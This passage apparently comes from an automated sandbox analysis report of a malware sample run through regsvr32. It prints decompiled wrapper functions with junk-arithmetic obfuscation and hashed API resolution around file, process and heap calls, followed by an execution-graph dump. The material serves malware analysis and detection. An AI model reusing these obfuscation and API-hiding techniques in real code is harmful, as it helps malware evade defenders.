                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: e017574e20abd4b42501e5639700262037a9d035103d9ae164503cc114cd30c0
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: 4CF08C71E0030CFBDB44DBE6D94AA9EBBF0EB50304F20C088D915A7241D7B56B088F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001FA50A Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E001FA50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t54;
				void* _t65;
				signed int _t66;
				signed int _t67;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E001EC98A(_t54);
				_v28 = 0xdc14f8;
				_v24 = 0xd964fd;
				_v20 = 0;
				_v16 = 0xcfd091;
				_v16 = _v16 << 0x10;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x910ec0c9;
				_v12 = 0x7a2ff2;
				_t66 = 0x43;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xd721c1d7;
				_v12 = _v12 ^ 0xd727192a;
				_v8 = 0x1eb7c0;
				_v8 = _v8 ^ 0x33199484;
				_t67 = 0x2d;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x05a21ecf;
				E001E7F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
				return _t65;
			}













                                                                                                                0x001fa511
                                                                                                                0x001fa516
                                                                                                                0x001fa519
                                                                                                                0x001fa51c
                                                                                                                0x001fa51f
                                                                                                                0x001fa520
                                                                                                                0x001fa523
                                                                                                                0x001fa526
                                                                                                                0x001fa529
                                                                                                                0x001fa52c
                                                                                                                0x001fa52f
                                                                                                                0x001fa532
                                                                                                                0x001fa536
                                                                                                                0x001fa537
                                                                                                                0x001fa53c
                                                                                                                0x001fa546
                                                                                                                0x001fa54f
                                                                                                                0x001fa552
                                                                                                                0x001fa559
                                                                                                                0x001fa55d
                                                                                                                0x001fa561
                                                                                                                0x001fa568
                                                                                                                0x001fa574
                                                                                                                0x001fa579
                                                                                                                0x001fa57e
                                                                                                                0x001fa585
                                                                                                                0x001fa58c
                                                                                                                0x001fa593
                                                                                                                0x001fa59e
                                                                                                                0x001fa5aa
                                                                                                                0x001fa5b3
                                                                                                                0x001fa5bb
                                                                                                                0x001fa5cb
                                                                                                                0x001fa5e4
                                                                                                                0x001fa5ea

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 001FA5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: 99e081d5ffaef02d30b1974f332de4fd57b053bab31117f97c95c38aa568aa66
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: 5021E372901108FBDF05CFE9CD4A8DEBFB6EF48314F108149FA1866260D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001E816B Relevance: 1.6, APIs: 1, Instructions: 68processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E001E816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t45;
				int _t52;
				struct _STARTUPINFOW* _t56;

				_push(_a64);
				_t56 = __ecx;
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E001EC98A(_t45);
				_v12 = 0x5160ce;
				_v12 = _v12 ^ 0x33bed16b;
				_v12 = _v12 + 0xffffe3b5;
				_v12 = _v12 | 0x3554987c;
				_v12 = _v12 ^ 0x37f1882e;
				_v8 = 0x57d154;
				_v8 = _v8 + 0xffff861a;
				_v8 = _v8 * 0x3e;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x0012f1da;
				_v16 = 0x81ccd1;
				_v16 = _v16 >> 4;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x000c22df;
				E001E7F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
				return _t52;
			}









                                                                                                                0x001e8173
                                                                                                                0x001e8178
                                                                                                                0x001e817a
                                                                                                                0x001e817d
                                                                                                                0x001e8180
                                                                                                                0x001e8183
                                                                                                                0x001e8186
                                                                                                                0x001e8187
                                                                                                                0x001e818a
                                                                                                                0x001e818b
                                                                                                                0x001e818e
                                                                                                                0x001e818f
                                                                                                                0x001e8192
                                                                                                                0x001e8195
                                                                                                                0x001e8196
                                                                                                                0x001e8199
                                                                                                                0x001e819c
                                                                                                                0x001e819f
                                                                                                                0x001e81a0
                                                                                                                0x001e81a1
                                                                                                                0x001e81a6
                                                                                                                0x001e81b0
                                                                                                                0x001e81bc
                                                                                                                0x001e81c3
                                                                                                                0x001e81ca
                                                                                                                0x001e81d1
                                                                                                                0x001e81d8
                                                                                                                0x001e81ef
                                                                                                                0x001e81f2
                                                                                                                0x001e81f6
                                                                                                                0x001e81fd
                                                                                                                0x001e8204
                                                                                                                0x001e8208
                                                                                                                0x001e820c
                                                                                                                0x001e821c
                                                                                                                0x001e8236
                                                                                                                0x001e823d

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 001E8236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: e76f5cc3b7eb5ba2e10dbb640cdd2b6ca91f059f3de9a5592a86f3c2c0f943e0
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: 7221C372801248FBCF159F96CD09CCFBFB9EB99714F108098FA1562161D3729A65EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001E3466 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001E3466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t29;
				intOrPtr* _t35;
				void* _t36;
				void* _t41;

				_t41 = __ecx;
				E001EC98A(_t29);
				_v8 = 0x88f6ec;
				_v8 = _v8 | 0x6177bf25;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 + 0x167f;
				_v8 = _v8 ^ 0x0004f919;
				_v16 = 0x9ca171;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x0005b7ae;
				_v12 = 0xf5b080;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x54793a02;
				_t35 = E001E7F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
				return _t36;
			}










                                                                                                                0x001e3473
                                                                                                                0x001e3486
                                                                                                                0x001e348b
                                                                                                                0x001e3495
                                                                                                                0x001e34a1
                                                                                                                0x001e34a5
                                                                                                                0x001e34ac
                                                                                                                0x001e34b3
                                                                                                                0x001e34ba
                                                                                                                0x001e34be
                                                                                                                0x001e34c5
                                                                                                                0x001e34dc
                                                                                                                0x001e34df
                                                                                                                0x001e34ef
                                                                                                                0x001e34fe
                                                                                                                0x001e3505

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 001E34FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: f2625d66b4f5836c352598ca7a3fe0f3b40b1de4f6a6296bb8e3fc1f15c1535c
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: 66113672801248BBDB11DFA6DD0AC9FBFB8EB95704F108098F914A2210D3714B24DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001FEAB3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001FEAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				intOrPtr* _t40;
				void* _t41;

				E001EC98A(_t35);
				_v28 = 0xe6c580;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0x2d161b;
				_v8 = _v8 + 0xffffdf88;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 | 0xc1e5ff2b;
				_v8 = _v8 ^ 0xc1e88dee;
				_v16 = 0xd78d92;
				_v16 = _v16 ^ 0xcf4c3c1d;
				_v16 = _v16 ^ 0xcf92c072;
				_v12 = 0x4f9c9d;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0xffff6ea2;
				_v12 = _v12 ^ 0x00061ead;
				_t40 = E001E7F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
				return _t41;
			}












                                                                                                                0x001feacf
                                                                                                                0x001fead4
                                                                                                                0x001feade
                                                                                                                0x001feae6
                                                                                                                0x001feae9
                                                                                                                0x001feaf0
                                                                                                                0x001feaf7
                                                                                                                0x001feafb
                                                                                                                0x001feb02
                                                                                                                0x001feb09
                                                                                                                0x001feb10
                                                                                                                0x001feb17
                                                                                                                0x001feb1e
                                                                                                                0x001feb25
                                                                                                                0x001feb29
                                                                                                                0x001feb30
                                                                                                                0x001feb49
                                                                                                                0x001feb5a
                                                                                                                0x001feb60

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 001FEB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: c565ddc0e5e9a96162646355b106eb1aa1a2870728e2729c207334e4304db971
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 80111376C0121DFFCF10DFA5990A9EEBFB4EB54314F108089EA14A6294D3B14B64AFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001F7DA0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001F7DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t34;
				int _t44;
				signed int _t46;
				signed int _t47;
				struct _SHFILEOPSTRUCTW* _t54;

				_push(_a4);
				_t54 = __edx;
				_push(__edx);
				E001EC98A(_t34);
				_v12 = 0xcdb49a;
				_v12 = _v12 + 0x8f05;
				_v12 = _v12 + 0xffff9965;
				_v12 = _v12 ^ 0x00c100f7;
				_v16 = 0xfe6a9a;
				_v16 = _v16 + 0xffff1466;
				_v16 = _v16 ^ 0x00fd95e9;
				_v8 = 0xca762f;
				_v8 = _v8 << 0xe;
				_t46 = 0x7f;
				_v8 = _v8 / _t46;
				_t47 = 0x2e;
				_v8 = _v8 / _t47;
				_v8 = _v8 ^ 0x00082e4e;
				E001E7F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
				_t44 = SHFileOperationW(_t54); // executed
				return _t44;
			}











                                                                                                                0x001f7da7
                                                                                                                0x001f7daa
                                                                                                                0x001f7dac
                                                                                                                0x001f7dae
                                                                                                                0x001f7db3
                                                                                                                0x001f7dbd
                                                                                                                0x001f7dc6
                                                                                                                0x001f7dcd
                                                                                                                0x001f7dd4
                                                                                                                0x001f7ddb
                                                                                                                0x001f7de2
                                                                                                                0x001f7de9
                                                                                                                0x001f7df0
                                                                                                                0x001f7df9
                                                                                                                0x001f7dfe
                                                                                                                0x001f7e06
                                                                                                                0x001f7e0e
                                                                                                                0x001f7e16
                                                                                                                0x001f7e2d
                                                                                                                0x001f7e36
                                                                                                                0x001f7e3c

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 001F7E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: bb86ae0d1b39cf27997703b822caa80001e80363d7a3e2591d4405f478c950c8
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: 1E1179B2D00208FBDB14DFA9D80A8DEBBB5EB45314F208199E418A6241E7B55F149F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001E3506 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E001E3506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t39;
				void* _t47;
				signed int _t49;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001EC98A(_t39);
				_v16 = 0xf4e2fc;
				_t49 = 0x3b;
				_v16 = _v16 / _t49;
				_v16 = _v16 ^ 0x00083f87;
				_v12 = 0x549d10;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0xffff8515;
				_v12 = _v12 | 0x9f85c2ad;
				_v12 = _v12 ^ 0x9fa0e66d;
				_v8 = 0xbeaf63;
				_v8 = _v8 | 0x7acbe5f7;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x3b62dfe8;
				_v8 = _v8 ^ 0xcc9b72fd;
				E001E7F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
				return _t47;
			}









                                                                                                                0x001e350c
                                                                                                                0x001e350f
                                                                                                                0x001e3512
                                                                                                                0x001e3515
                                                                                                                0x001e3518
                                                                                                                0x001e351d
                                                                                                                0x001e3522
                                                                                                                0x001e3533
                                                                                                                0x001e353b
                                                                                                                0x001e3543
                                                                                                                0x001e354a
                                                                                                                0x001e3551
                                                                                                                0x001e3555
                                                                                                                0x001e355c
                                                                                                                0x001e3563
                                                                                                                0x001e356a
                                                                                                                0x001e3571
                                                                                                                0x001e3578
                                                                                                                0x001e357c
                                                                                                                0x001e3583
                                                                                                                0x001e359a
                                                                                                                0x001e35ab
                                                                                                                0x001e35b0

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 001E35AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: fb14c780019df670ba93329bc37ef3482a0bf92fcbb035eed4a60a67e12cac11
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: BD112871D00208FFCF04DFA5D84689EBFB5EB44704F208088F9146A121D3728B24EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001F02D8 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E001F02D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t45;
				int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				void* _t75;

				_push(_a8);
				_t75 = __ecx;
				_push(_a4);
				_push(__ecx);
				E001EC98A(_t45);
				_v12 = 0xd4268f;
				_t61 = 0x55;
				_v12 = _v12 / _t61;
				_t62 = 0x39;
				_v12 = _v12 / _t62;
				_t63 = 0x19;
				_v12 = _v12 / _t63;
				_v12 = _v12 ^ 0x00038c24;
				_v16 = 0xae7fc4;
				_v16 = _v16 + 0x7c1;
				_v16 = _v16 ^ 0x00ac1f44;
				_v8 = 0x83f9bc;
				_v8 = _v8 ^ 0x1ab9b921;
				_v8 = _v8 | 0xa5451e1d;
				_t64 = 0x5c;
				_v8 = _v8 / _t64;
				_v8 = _v8 ^ 0x021ff71d;
				E001E7F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
				_t59 = CloseHandle(_t75); // executed
				return _t59;
			}













                                                                                                                0x001f02df
                                                                                                                0x001f02e2
                                                                                                                0x001f02e4
                                                                                                                0x001f02e8
                                                                                                                0x001f02e9
                                                                                                                0x001f02ee
                                                                                                                0x001f02ff
                                                                                                                0x001f0304
                                                                                                                0x001f030c
                                                                                                                0x001f0311
                                                                                                                0x001f0319
                                                                                                                0x001f031e
                                                                                                                0x001f0323
                                                                                                                0x001f032a
                                                                                                                0x001f0331
                                                                                                                0x001f0338
                                                                                                                0x001f033f
                                                                                                                0x001f0346
                                                                                                                0x001f034d
                                                                                                                0x001f0357
                                                                                                                0x001f035f
                                                                                                                0x001f0367
                                                                                                                0x001f037b
                                                                                                                0x001f0384
                                                                                                                0x001f038a

                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 001F0384
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.473013320.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.473010416.00000000001E0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.473045478.0000000000204000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_1e0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction ID: f1700c63e3929151d68984be9189f61f6eabeb9c2031d6e62353db256bc9be30
                                                                                                                • Opcode Fuzzy Hash: e059c3c066ff345504bba9c85b1d4992eba54445fe3d98b1d9d536134e0d9d68
                                                                                                                • Instruction Fuzzy Hash: B3114F71E01208FFEB08DFA5D80A9EEBBB5EB84314F50C09AE514AB281E7B15F119F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.4%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:1039
                                                                                                                Total number of Limit Nodes:15
                                                                                                                execution_graph 5007 27f7f4 5008 27f8f9 5007->5008 5009 26e4f5 2 API calls 5008->5009 5014 27f93e 5008->5014 5010 27f90e 5009->5010 5015 269343 5010->5015 5013 27f94b GetPEB 5013->5014 5016 26935e 5015->5016 5018 2694a2 5016->5018 5019 279635 5016->5019 5018->5013 5020 27964e 5019->5020 5021 267f78 GetPEB 5020->5021 5022 2796c5 5021->5022 5022->5016 5023 264313 5032 26484a 5023->5032 5025 26303a 2 API calls 5025->5032 5026 2717d2 GetPEB 5026->5032 5027 264a79 5028 2702d8 2 API calls 5027->5028 5030 264a77 5028->5030 5029 280575 GetPEB 5029->5032 5032->5025 5032->5026 5032->5027 5032->5029 5032->5030 5034 262263 GetPEB 5032->5034 5035 27a50a 2 API calls 5032->5035 5036 27eb61 5032->5036 5040 26bee4 5032->5040 5044 27487b 5032->5044 5034->5032 5035->5032 5037 27eb8f 5036->5037 5038 267f78 GetPEB 5037->5038 5039 27ec19 5038->5039 5039->5032 5041 26befd 5040->5041 5042 267f78 GetPEB 5041->5042 5043 26bf7c 5042->5043 5043->5032 5045 27488b 5044->5045 5046 267f78 GetPEB 5045->5046 5047 274902 5046->5047 5047->5032 3790 2825d1 3795 2650cf 3790->3795 3792 282661 3831 277b25 3792->3831 3794 282675 3827 26638d 3795->3827 3796 266c56 4047 26cde0 3796->4047 3800 278ef8 GetPEB RtlAllocateHeap 3800->3827 3805 2734da GetPEB RtlAllocateHeap 3805->3827 3807 2717d2 GetPEB 3807->3827 3820 266c46 3820->3792 3826 27f94b GetPEB 3826->3827 3827->3796 3827->3800 3827->3805 3827->3807 3827->3820 3827->3826 3834 280e7a 3827->3834 3842 269af8 3827->3842 3846 268844 3827->3846 3856 269c1b 3827->3856 3869 2813a3 3827->3869 3880 2682d2 3827->3880 3890 27416e 3827->3890 3904 278131 3827->3904 3916 27d15e 3827->3916 3925 27fecb 3827->3925 3934 271a83 3827->3934 3937 27eec2 3827->3937 3947 2679cc 3827->3947 3951 278966 3827->3951 3960 280a01 3827->3960 3971 279285 3827->3971 3975 27fad1 3827->3975 3980 26a9cf 3827->3980 3989 2826fc 3827->3989 3994 281fc7 3827->3994 4001 268ee5 3827->4001 4007 27d4ae 3827->4007 4018 26ae33 3827->4018 4022 27604b 3827->4022 4028 2726f3 3827->4028 4031 26e65a 3827->4031 4038 273231 3827->4038 3832 267f78 GetPEB 3831->3832 3833 277b93 ExitProcess 3832->3833 3833->3794 3840 2811a2 3834->3840 3838 2812e6 3838->3827 3840->3838 4061 2791cc 3840->4061 4065 2702d8 3840->4065 4069 27a50a 3840->4069 4073 280575 3840->4073 4077 282545 3840->4077 3843 269b12 3842->3843 3844 269c05 3843->3844 3845 281e49 GetPEB RtlAllocateHeap LoadLibraryW 3843->3845 3844->3827 3845->3843 3849 268b4a 3846->3849 3852 268c94 3849->3852 3855 268c92 3849->3855 4115 263466 3849->4115 4119 266e01 3849->4119 4123 27ed7b 3849->4123 4127 26303a 3849->4127 4132 267761 3849->4132 3854 280575 GetPEB 3852->3854 3854->3855 3855->3827 3865 26a250 3856->3865 3858 27ed7b 2 API calls 3858->3865 3860 266e01 2 API calls 3860->3865 3861 26a4b4 3866 27ed7b 2 API calls 3861->3866 3862 26a4b2 3862->3827 3865->3858 3865->3860 3865->3861 3865->3862 3868 263466 2 API calls 3865->3868 4154 26364e 3865->4154 4165 279862 3865->4165 4169 27f5d9 3865->4169 4173 26d467 3865->4173 4177 27f94b 3865->4177 3866->3862 3868->3865 3877 2817ea 3869->3877 3870 2819e8 3872 2702d8 2 API calls 3870->3872 3871 282545 GetPEB 3871->3877 3873 2819e6 3872->3873 3873->3827 3875 27a50a 2 API calls 3875->3877 3876 27f5d9 2 API calls 3876->3877 3877->3870 3877->3871 3877->3873 3877->3875 3877->3876 3879 27f94b GetPEB 3877->3879 4213 27eab3 3877->4213 4217 278eb3 3877->4217 3879->3877 3884 26855b 3880->3884 3881 268648 4235 268fe9 3881->4235 3882 27f5d9 2 API calls 3882->3884 3884->3881 3884->3882 3885 268646 3884->3885 3886 280575 GetPEB 3884->3886 3887 278eb3 GetPEB 3884->3887 3888 27f94b GetPEB 3884->3888 4221 264b40 3884->4221 3885->3827 3886->3884 3887->3884 3888->3884 3891 27468e 3890->3891 3894 27f5d9 2 API calls 3891->3894 3895 2746c9 3891->3895 3896 26303a GetPEB RtlAllocateHeap 3891->3896 3897 274876 3891->3897 3901 27f94b GetPEB 3891->3901 4269 26d2c9 3891->4269 4273 269291 3891->4273 4277 272519 3891->4277 3894->3891 3899 